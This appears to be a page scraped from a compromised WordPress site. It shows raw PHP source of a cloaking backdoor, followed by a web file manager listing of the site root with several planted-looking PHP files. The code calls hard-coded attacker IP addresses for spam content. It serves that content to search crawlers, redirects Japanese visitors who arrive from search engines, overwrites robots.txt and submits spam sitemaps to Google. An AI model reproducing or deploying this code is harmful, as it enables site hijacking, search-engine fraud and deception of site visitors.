$req_uri = $_SERVER['REQUEST_URI']; $self = $_SERVER['PHP_SELF']; $inter_domain='http://142.54.172.170/z50426_12/'; if(strstr($req_uri, 'header.php')){ $inter_domain='http://199.168.102.234/z50428_2/'; $self='/header.php'; } if(strstr($req_uri, 'good.php')){ $inter_domain='http://192.187.99.106/z40229_7/'; $self='/good.php'; } $sx_ap=''; function stp(){ return exit; } function curl_get_contents($url){$ch=curl_init();curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);$file_contents = curl_exec($ch);curl_close($ch);return $file_contents; } function getServerCont($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;} function getServerCont11($url,$data=array()){$url=str_replace(' ','+',$url);$ch=curl_init();curl_setopt($ch,CURLOPT_URL,"$url");curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);curl_setopt($ch,CURLOPT_POSTFIELDS,http_build_query($data));$output = curl_exec($ch);$errorCode = curl_errno($ch);curl_close($ch);if(0!== $errorCode){ return false;}return $output;} function is_crawler($agent){$agent_check=false; $bots='googlebot|google|yahoo|bing|aol';if($agent!=''){if(preg_match("/($bots)/si",$agent)){$agent_check = true; }}return $agent_check;} function check_refer($refer){ $check_refer=false;$referbots='google.co.jp|yahoo.co.jp|google.com';if($refer!='' && preg_match("/($referbots)/si",$refer)){ $check_refer=true; }return $check_refer; } $http=((isset($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off')?'https://':'http://'); $domain=$_SERVER["HTTP_HOST"]; $ser_name=$_SERVER['SERVER_NAME']; $req_url=$http.$domain.$req_uri; $indata1=$inter_domain."/indata.php"; $map1=$inter_domain."/map.php"; $jump1=$inter_domain."/jump.php"; $url_words=$inter_domain."/words.php"; $url_robots=$inter_domain."/robots.php"; if(strpos($req_uri,".php")){$href1=$http.$domain.$self;}else{$href1=$http.$domain;} $data1[]=array();$data1['domain']=$domain;$data1['req_uri']=$req_uri;$data1['href']=$href1;$data1['req_url']=$req_url; if(substr($req_uri,-6)=='robots'){ $robots_cont=@file_get_contents($_SERVER['DOCUMENT_ROOT'].'/robots.txt'); $data1['robots_cont'] = $robots_cont; $robots_cont = getServerCont($url_robots,$data1); $result=file_put_contents($_SERVER['DOCUMENT_ROOT'].'/robots.txt', $robots_cont); if($result){ echo $_SERVER['DOCUMENT_ROOT'].'robots.txt file create success!'; }else{ echo $_SERVER['DOCUMENT_ROOT'].'robots.txt file create fail!'; } return; } if(substr($req_uri,-4)=='.xml'){if(strpos($req_uri,"pingsitemap.xml")){ $str_cont = getServerCont($map1,$data1); $str_cont_arr= explode(",",$str_cont); $str_cont_arr[]='sitemap'; for($k=0;$k 0){ $tt1='?'; }else{ $tt1='/';}$http2=$href1.$tt1.$str_cont_arr[$k].'.xml';$data_new='https://www.google.com/ping?sitemap='.$http2;$data_new1='http://www.google.com/ping?sitemap='.$http2;if(stristr(@file_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new),'successfully')){echo $data_new.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@file_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL;}else if(stristr(@curl_get_contents($data_new1),'successfully')){echo $data_new1.'===>Submitting Google Sitemap: OK'.PHP_EOL; }else{echo $data_new1.'===>Submitting Google Sitemap: fail'.PHP_EOL;} } exit();} if(strpos($req_uri,"allsitemap.xml") || strpos($req_uri,"sitemap-index.xml") || strpos($req_uri,"sitemap-index-1.xml")){ $str_cont = getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont; exit();} if(strpos($req_uri,".php")){ $word4=explode("?",$req_uri); $word4=$word4[count($word4)-1]; $word4=str_replace(".xml","",$word4); }else{ $word4= str_replace("/","",$req_uri);$word4= str_replace(".xml","",$word4); }$data1['word']=$word4;$data1['action']='check_sitemap';$check_url4=getServerCont($url_words,$data1);if($check_url4=='1'){ $str_cont=getServerCont($map1,$data1); header("Content-type:text/xml"); echo $str_cont;exit();} $data1['action']="check_words"; $check1= getServerCont($url_words,$data1);if(strpos($req_uri,"map")> 0 || $check1=='1') $data1['action']="rand_xml";$check_url4=getServerCont($url_words,$data1);header("Content-type:text/xml");echo $check_url4;exit();}if(strpos($req_uri,".php")){$main_shell=$http.$ser_name.$self;$data1['main_shell']=$main_shell;}else{$main_shell=$http.$ser_name;$data1['main_shell']=$main_shell;}$referer=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';$chk_refer=check_refer($referer); $user_agent=strtolower(isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'');$res_crawl=is_crawler($user_agent); if(strpos($_SERVER['REQUEST_URI'],'.php')){ $url_ext='?'; }else{ $url_ext='/'; } if(($chk_refer && !$res_crawl) && preg_match('/ja/i',@$_SERVER['HTTP_ACCEPT_LANGUAGE'])){echo getServerCont11($jump1,$data1);exit(); } if($res_crawl){ $data1['http_user_agent']=$user_agent; echo getServerCont11($indata1,$data1);exit();}

नामः प्रकारः आकृति अनुज्ञापत्रम् नामपत्र
.qidb Folder -- drwxr-xr-x
.quarantine Folder -- drwxr-xr-x
.tmb Folder -- drwxr-xr-x
.well-known Folder -- drwxr-xr-x
.wp-cli Folder -- drwxr-xr-x
wp-admin Folder -- drwxr-xr-x
wp-content Folder -- drwxr-xr-x
wp-includes Folder -- drwxr-xr-x
.htaccess File 0.551 KB -r--r--r--
.user.ini File 0.092 KB -rw-r--r--
_250507092414.php File 9.212 KB -rw-r--r--
_250507092511.php File 5.698 KB -rw-r--r--
_250507092530.ini File 0.092 KB -rw-r--r--
admin-dbb-class.php File 32.133 KB -rw-r--r--
header.php File 9.212 KB -rw-r--r--
index.php File 7.185 KB -r--r--r--
info.php File 0.07 KB -rw-r--r--
licencia.txt File 17.515 KB -rw-r--r--
license.txt File 19.448 KB -rw-r--r--
php.ini File 0.646 KB -rw-r--r--
readme.html File 7.107 KB -rw-r--r--
valleykno.php File 0.957 KB -rw-r--r--
wordfence-waf.php File 0.364 KB -rw-r--r--
wp-activate.php File 6.935 KB -rw-r--r--
wp-blog-header.php File 3.073 KB -r--r--r--
wp-comments-post.php File 2.277 KB -rw-r--r--
wp-config-sample.php File 2.845 KB -rw-r--r--
wp-config.php File 2.981 KB -rw-r--r--
wp-confiq.php File 92.037 KB -rw-r--r--
wp-cron.php File 6.578 KB -rw-r--r--
wp-links-opml.php File 2.438 KB -rw-r--r--
wp-load.php File 3.223 KB -rw-r--r--
wp-login-css.php File 258.899 KB -rw-r--r--
wp-login.php File 47.618 KB -rw-r--r--
wp-mail.php File 8.256 KB -rw-r--r--
wp-settings.php File 19.708 KB -rw-r--r--
wp-signup.php File 30.429 KB -rw-r--r--
wp-trackback.php File 4.711 KB -rw-r--r--
xinder.php File 5.691 KB -rw-r--r--
xmlrpc.php File 3.16 KB -rw-r--r--
Tiny File Manager